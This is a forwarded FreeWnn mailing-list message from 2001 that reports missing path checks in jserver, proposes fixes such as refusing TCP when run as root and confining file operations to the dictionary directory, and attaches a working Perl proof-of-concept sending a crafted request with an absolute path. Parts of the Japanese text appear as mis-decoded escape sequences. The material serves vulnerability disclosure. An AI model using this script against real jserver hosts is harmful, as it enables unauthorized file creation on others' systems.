
[freewnn:00688] Fw: Re: security bug report



田畑さんからの返事がきました。


田畑です

メイリングリストには参加していないので
小野さんのみへのリプライとなります。転送などは御自由にどうぞ。

<20010814210653L.hiroo@oikumene.gcd.org>$B$N5-;v$K$*$$$F(B
hiroo@oikumene.gcd.org$B$5$s$O=q$-$^$7$?!#(B

>> $BEDH*$5$s$,%A%'%C%/$5$l$?(B FreeWnn $B$N%P!<%8%g%s$H!"%=!<%9%3!<%I$N3:Ev$9(B
>> $B$k2U=j$r65$($FD:$1$J$$$G$7$g$&$+!#(B
FreeWnn-1.1.1-a17$B$G$9!#(B
exploit$B%W%m%0%i%`$N40A4HG$O:G8e$KIU$1$^$9(B($B<c43>iD9$J%=!<%9$G$9$,(B)

jserver/de.c $B$N(Bdemon_main.c() $B$G%Q%1%C%H$r<u$1$H$j(B
jserver/dispatch.c $B$N(B do_command() $BCf$N(Bswitch$BJ8$G(B
js_mkdir()$B$d(B js_dic_file_create()$B$r7P$F<B:]$N%U%!%$%kA`:n$X;j$k$^$G$N(B
$B%Q%9$G%A%'%C%/$,9T$J$o$l$F$$$J$$$H$$$&$3$H$,LdBj$N$h$&$G$9!#(B
$BB>$K$b$"$k$H;W$$$^$9$N$G%A%'%C%/$r$*4j$$$7$^$9!#(B

>> これから調査するところですが、報告して頂いた内容からすると、Wnn のプロ
>> トコルの正当な要求のようなので (牧歌的な時代に作られたものということな
>> のでしょうが)、よく考えて変更を加える必要があると思っています。
>> (cf. [freewnn:00683])
>> 対策について提案があれば歓迎致します。

$BBP:v$H$7$F$O(B

*root$B$G5/F0$7$?:]$K$O(BTCP$B$K$h$k@\B3$O<u$1$J$$(B
*root$B$GF0$+$7$F$O$$$1$J$$$3$H$rL@5-$9$k(B/root$B$G$OF0$+$J$$$h$&$K$9$k(B
*$B<-=q$N%G%#%l%/%H%j$N30$K$O%U%!%$%kA`:n$r$G$-$J$$$h$&$K$9$k(B
*$BFCDj$NL>A0$N%Q%?!<%s$r;}$C$?%U%!%$%k0J30$OA`:n$G$-$J$$$h$&$K$9$k(B
*Wnn6$B$HF1$8(Bwnnhosts$B$r:NMQ$9$k!"$?$@$7$3$N%"%/%;%9%3%s%H%m!<%k$O@\B3;~$K9T$&(B

$B$J$I$,;W$$$D$-$^$9!#(B

>> $B;CDj:v(B (workaround)$B!"915W:v(B (solution) $B$,Dj$^$j<!BhJs9p$7$?$$$H9M$($F(B
>> $B$$$^$9$,!"$=$&$$$&$o$1$G!":#$9$0$O<($;$^$;$s!#(B
solution$B$r9M$($k:]$K$O(B
*$B<-=q%U%!%$%k$N%W%i%$%P%7!<(B
*$BG'>Z(B
*$BDL?.$N0E9f2=(B
$B$J$I$b8!F$$r$*4j$$$7$^$9!#(B

以下は冗長ですが、問題を引き起こすプログラムです

#! /usr/bin/perl
         # Reproduction script attached to the FreeWnn-1.1.1-a17 report above.
         # It opens one TCP connection to a jserver and sends a single request
         # that carries a client-chosen absolute path ("/tmp/hoge"). The message
         # says the path from do_command() in jserver/dispatch.c through
         # js_mkdir() / js_dic_file_create() to the file operation is unchecked.
         #
         # Usage: script [host [port]]   (defaults: localhost, 22273)
         #
         # NOTE(review): for defenders, the fix belongs in the server, not here.
         # The message proposes confining file operations to the dictionary
         # directory, restricting file name patterns, not running jserver as
         # root, and host-based access control applied at connect time. A
         # request whose path argument is absolute and outside the dictionary
         # tree is the observable to look for.
          ($them,$port) = @ARGV;
         $port = 22273 unless $port;
         $them = 'localhost' unless $them;

         # On Ctrl-C, kill the forked process recorded in $child (signal 9).
         $SIG{'INT'} = 'dokill';
         sub dokill { kill 9,$child if $child; }

         use Socket;

         # Hand-built socket address template: native short (address family),
         # network-order 16-bit port, 4 address bytes, 8 NUL padding bytes.
         $sockaddr = 'S n a4 x8';
         # chop removes the last character of the `hostname` output
         # (presumably the trailing newline).
         chop($hostname = `hostname`);

         ($name, $aliases, $proto) = getprotobyname('tcp');
         # A non-numeric port argument is treated as a service name and looked up.
         ($name, $aliases, $port) = getservbyname($port, 'tcp')
             unless $port =~ /^\d+$/;
         # NOTE(review): neither gethostbyname result is checked for failure.
         ($name, $aliases, $type, $len, $thisaddr) =
                         gethostbyname($hostname);
         ($name, $aliases, $type, $len, $thataddr) = gethostbyname($them);

         # $this is only referenced by the commented-out bind() below, so it is
         # effectively unused.
         $this = pack($sockaddr, &AF_INET, 0, $thisaddr);
         $that = pack($sockaddr, &AF_INET, $port, $thataddr);

         socket(S, &PF_INET, &SOCK_STREAM, $proto) || die "socket: $!";
#         bind(S, $this) || die "bind: $!";
         connect(S, $that) || die "connect: $!";

         # Turn on autoflush for the socket, then restore STDOUT as the default
         # output handle.
         select(S); $| = 1; select(STDOUT);
	print "connected!";

         # fork returns the child's pid in the parent: the parent writes the
         # request, the child (else branch) echoes whatever the server sends back.
         if ($child = fork) {
	     print STDOUT "send";
	     # Request layout as written: a 4-byte big-endian value 0x66, a
	     # 4-byte zero, the NUL-terminated path, then two more 4-byte values
	     # (0 and 3). NOTE(review): 0x66 is presumably the command code
	     # selected by the switch in do_command(); the meaning of the other
	     # fields is not shown on this page -- confirm against the protocol
	     # definitions in the FreeWnn source.
	     print S "\x00\x00\x00\x66\x00\x00\x00\x00".
		 "/tmp/hoge\x00".
		     "\x00\x00\x00\x00\x00\x00\x00\x03";
	     print STDOUT ".done.\n";
             # Give the reader process a few seconds to print any reply, then
             # stop it. `do dokill()` is the legacy `do SUBROUTINE(LIST)` call
             # form.
             sleep 3;
             do dokill();
         }
         else {
             # Child: copy each line received on the socket to STDOUT.
             while (<S>) {
                 print;
             }
         }




http://www.freewnn.org/ FreeWnn Project